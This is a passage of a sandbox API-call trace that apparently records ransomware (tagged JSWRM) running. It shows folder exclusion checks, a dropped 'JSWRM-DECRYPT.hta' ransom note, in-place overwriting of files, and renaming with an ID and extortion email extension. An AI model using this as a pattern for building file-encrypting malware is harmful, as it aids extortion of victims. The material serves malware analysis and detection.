lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vcruntime140.dll", lpUsedDefaultChar=0x0) returned 16 [0101.314] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.314] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0101.314] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vcruntime140.dll", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0101.314] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0101.314] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vcruntime140.dll", cchWideChar=16, lpMultiByteStr=0x241128, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vcruntime140.dll", lpUsedDefaultChar=0x0) returned 16 [0101.314] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0101.314] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0101.314] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0101.314] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0101.314] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0101.314] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6223b13, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6223b13, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6296213, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x14d50, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="vcruntime140.dll", cAlternateFileName="VCRUNT~1.DLL")) returned 0 [0101.314] FindClose (in: hFindFile=0x231d00 | out: hFindFile=0x231d00) returned 1 [0101.314] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0101.314] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209350 | out: hHeap=0x1e0000) returned 1 [0101.314] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0101.314] FindNextFileW (in: hFindFile=0x232200, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee45f66d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x115da4b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x115da4b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="fre", cAlternateFileName="")) returned 1 [0101.314] lstrcmpiW (lpString1="fre", lpString2=".") returned 1 [0101.314] lstrcmpiW (lpString1="fre", lpString2="..") returned 1 [0101.314] lstrcmpiW (lpString1="fre", lpString2="...") returned 1 [0101.314] lstrcmpiW (lpString1="fre", lpString2="windows") returned -1 [0101.314] lstrcmpiW (lpString1="fre", lpString2="recovery") returned -1 [0101.314] lstrcmpiW (lpString1="fre", lpString2="perflogs") returned -1 [0101.314] lstrcmpiW (lpString1="fre", lpString2="documents and settings") returned 1 [0101.314] lstrcmpiW (lpString1="fre", lpString2="$RECYCLE.BIN") returned 1 [0101.314] lstrcmpiW (lpString1="fre", lpString2="system volume information") returned -1 [0101.345] lstrcmpiW (lpString1="fre", lpString2="msocache") returned -1 [0101.345] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e88 [0101.345] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0101.345] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0101.345] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0101.345] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217e00 [0101.345] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0101.345] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\fre\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\fre\\jswrm-decrypt.hta")) returned 0xffffffff [0101.349] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217e00 | out: hHeap=0x1e0000) returned 1 [0101.349] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.349] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345be5c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0101.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x205850 [0101.349] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0101.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24d210 [0101.349] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0101.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2093c8 [0101.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x2170f0 [0101.349] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2093c8 | out: hHeap=0x1e0000) returned 1 [0101.349] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\fre\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\fre\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0101.351] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.351] WriteFile (in: hFile=0x458, lpBuffer=0x345bf70*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bf3c, lpOverlapped=0x0 | out: lpBuffer=0x345bf70*, lpNumberOfBytesWritten=0x345bf3c*=0x230c, lpOverlapped=0x0) returned 1 [0101.352] CloseHandle (hObject=0x458) returned 1 [0101.352] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2170f0 | out: hHeap=0x1e0000) returned 1 [0101.352] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0101.352] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0101.352] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0101.352] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0101.352] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0101.352] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0101.352] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217e00 [0101.352] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0101.352] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\fre\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\fre\\jswrm-decrypt.hta")) returned 0x20 [0101.352] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217e00 | out: hHeap=0x1e0000) returned 1 [0101.352] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0101.352] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0101.352] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\fre\\*.*", lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee45f66d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x115da4b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x3312993b, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName=".", cAlternateFileName="")) returned 0x231c40 [0101.352] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0101.352] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee45f66d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x115da4b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x3312993b, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="..", cAlternateFileName="")) returned 1 [0101.352] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0101.352] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0101.352] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3312993b, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x3312993b, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x3312993b, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0101.353] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0101.353] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0101.353] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0101.353] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0101.353] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0101.353] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0101.353] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0101.353] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0101.353] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0101.353] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0101.353] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.353] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0101.353] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0101.353] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0101.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.353] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.353] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0101.353] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0101.353] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241010, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0101.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.353] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0101.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0101.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0101.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0101.353] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1158e0a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1158e0a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1158e0a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1e8fb, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="StartMenu_Win10.mp4", cAlternateFileName="STARTM~2.MP4")) returned 1 [0101.353] lstrcmpiW (lpString1="StartMenu_Win10.mp4", lpString2=".") returned 1 [0101.353] lstrcmpiW (lpString1="StartMenu_Win10.mp4", lpString2="..") returned 1 [0101.353] lstrcmpiW (lpString1="StartMenu_Win10.mp4", lpString2="...") returned 1 [0101.353] lstrcmpiW (lpString1="StartMenu_Win10.mp4", lpString2="windows") returned -1 [0101.353] lstrcmpiW (lpString1="StartMenu_Win10.mp4", lpString2="recovery") returned 1 [0101.353] lstrcmpiW (lpString1="StartMenu_Win10.mp4", lpString2="perflogs") returned 1 [0101.353] lstrcmpiW (lpString1="StartMenu_Win10.mp4", lpString2="documents and settings") returned 1 [0101.353] lstrcmpiW (lpString1="StartMenu_Win10.mp4", lpString2="$RECYCLE.BIN") returned 1 [0101.353] lstrcmpiW (lpString1="StartMenu_Win10.mp4", lpString2="system volume information") returned -1 [0101.354] lstrcmpiW (lpString1="StartMenu_Win10.mp4", lpString2="msocache") returned 1 [0101.354] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.354] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StartMenu_Win10.mp4", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0101.354] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0101.354] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StartMenu_Win10.mp4", cchWideChar=19, lpMultiByteStr=0x241038, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StartMenu_Win10.mp4", lpUsedDefaultChar=0x0) returned 19 [0101.354] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.354] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0101.354] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StartMenu_Win10.mp4", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0101.354] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0101.354] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StartMenu_Win10.mp4", cchWideChar=19, lpMultiByteStr=0x240f20, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StartMenu_Win10.mp4", lpUsedDefaultChar=0x0) returned 19 [0101.354] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0101.354] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0101.354] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0101.354] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.354] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.354] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225190 [0101.354] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\fre\\StartMenu_Win10.mp4" (normalized: "c:\\program files\\microsoft office\\root\\fre\\startmenu_win10.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0101.355] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=125179) returned 1 [0101.355] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.355] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1e8f0) returned 0x24d210 [0101.355] ReadFile (in: hFile=0x45c, lpBuffer=0x24d210, nNumberOfBytesToRead=0x1e8f0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345ec04*=0x1e8f0, lpOverlapped=0x0) returned 1 [0101.364] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.364] WriteFile (in: hFile=0x45c, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x1e8f0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345ec00*=0x1e8f0, lpOverlapped=0x0) returned 1 [0101.365] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0101.365] CloseHandle (hObject=0x45c) returned 1 [0101.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0101.365] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.365] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.365] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.365] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0101.365] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.365] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0101.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0101.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0101.365] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0101.365] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.365] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\fre\\StartMenu_Win10.mp4" (normalized: "c:\\program files\\microsoft office\\root\\fre\\startmenu_win10.mp4"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\fre\\StartMenu_Win10.mp4.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\fre\\startmenu_win10.mp4.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0101.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0101.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225190 | out: hHeap=0x1e0000) returned 1 [0101.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0101.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0101.366] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x11567da2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x11567da2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1158e0a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1ce1b, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="StartMenu_Win10_RTL.mp4", cAlternateFileName="STARTM~1.MP4")) returned 1 [0101.366] lstrcmpiW (lpString1="StartMenu_Win10_RTL.mp4", lpString2=".") returned 1 [0101.366] lstrcmpiW (lpString1="StartMenu_Win10_RTL.mp4", lpString2="..") returned 1 [0101.366] lstrcmpiW (lpString1="StartMenu_Win10_RTL.mp4", lpString2="...") returned 1 [0101.366] lstrcmpiW (lpString1="StartMenu_Win10_RTL.mp4", lpString2="windows") returned -1 [0101.366] lstrcmpiW (lpString1="StartMenu_Win10_RTL.mp4", lpString2="recovery") returned 1 [0101.367] lstrcmpiW (lpString1="StartMenu_Win10_RTL.mp4", lpString2="perflogs") returned 1 [0101.367] lstrcmpiW (lpString1="StartMenu_Win10_RTL.mp4", lpString2="documents and settings") returned 1 [0101.367] lstrcmpiW (lpString1="StartMenu_Win10_RTL.mp4", lpString2="$RECYCLE.BIN") returned 1 [0101.367] lstrcmpiW (lpString1="StartMenu_Win10_RTL.mp4", lpString2="system volume information") returned -1 [0101.367] lstrcmpiW (lpString1="StartMenu_Win10_RTL.mp4", lpString2="msocache") returned 1 [0101.367] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StartMenu_Win10_RTL.mp4", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0101.367] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0101.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StartMenu_Win10_RTL.mp4", cchWideChar=23, lpMultiByteStr=0x240ef8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StartMenu_Win10_RTL.mp4", lpUsedDefaultChar=0x0) returned 23 [0101.367] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.367] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0101.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StartMenu_Win10_RTL.mp4", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0101.367] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0101.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StartMenu_Win10_RTL.mp4", cchWideChar=23, lpMultiByteStr=0x241330, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StartMenu_Win10_RTL.mp4", lpUsedDefaultChar=0x0) returned 23 [0101.367] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0101.367] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0101.367] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0101.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.367] RtlAllocateHeap 